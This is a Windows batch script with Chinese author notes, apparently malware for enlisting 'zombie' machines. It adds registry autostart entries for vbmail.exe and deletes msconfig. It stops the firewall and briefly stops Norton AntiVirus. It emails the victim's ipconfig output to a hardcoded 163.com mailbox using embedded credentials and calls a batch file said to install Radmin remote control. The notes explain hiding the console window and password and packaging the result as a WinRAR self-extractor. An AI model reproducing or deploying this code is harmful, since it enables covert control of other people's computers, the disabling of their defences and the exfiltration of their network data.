@echo off
set|find /i "OS=Windows_NT">nul
if not errorlevel 0 goto end
FOR /F "SKIP=1 DELIMS=" %%A IN ('VER') DO TITLE %%A
net start "task scheduler">nul
ver|find /i "Windows 2000">nul||goto XP
echo REGEDIT4>%windir%\system32\inf.dll  
echo.>>%windir%\system32\inf.dll          
echo [hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon]>>%windir%\system32\inf.dll
echo "userinit"="%systemdrive%\\winnt\\system32\\userinit.exe,%systemdrive%\\winnt\\system32\\vbmail.exe,">>%windir%\system32\inf.dll
goto reg
:XP
net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
if exist %windir%\system32\dllcache\msconfig.exe del %windir%\system32\dllcache\msconfig.exe
if exist %windir%\system32\msconfig.exe del %windir%\system32\msconfig.exe
echo REGEDIT4 >%windir%\system32\inf.dll
echo.>>%windir%\system32\inf.dll
echo [hkey_local_machine\software\microsoft\windows\currentversion\run]>>%windir%\system32\inf.dll
echo "Windows XP"="vbmail.exe">>%windir%\system32\inf.dll
:reg
regedit -s %windir%\system32\inf.dll
for /f "delims=: tokens=1-2" %%a in ('time /t') do set h=%%a&&set s=%%b
set /a s+=20
if %s% geq 60 set s=10&&set /a h+=1
if %h% geq 24 set h=0
at /y /d
if exist %windir%\system32\r_server.bat call %windir%\system32\r_server.bat
ping www.sina.com -n 1 -l 10 -w 1|find "Lost = 0">nul
if errorlevel 1 goto attime
ipconfig /all>%windir%\system32\ip.txt
net start |find /i "Norton AntiVirus 自动防护服务"&&net stop "Norton AntiVirus 自动防护服务">nul
XMAIL.exe SMTP.163.com zuzong20asd@163.com sanjiaokuasd@163.com %windir%\system32\ip.txt zuzong2000 %win2000%>nul
net start "Norton AntiVirus 自动防护服务">nul
goto end
:attime
at %h%:%s% %windir%\system32\vbmail.exe>nul
:end

实现了自启动
配合XMALI邮件发送工具 把肉鸡的IP经过ICMP判断是否在线后发送到指定的油箱
如果当前未上线则继续等到20分钟再判断
r_server.bat为安装RADMIN的批出理
当时分开来写了
通过VB 或者VC写个函数来调用
比如SHELLEXCUTE 这样的好处一是没有黑色DOS窗口 二是发送邮箱的密码可以填写在VB VC函数里作为DOS参数传递 而不会已明文显示在BAT中

然后通过WINRAR自释放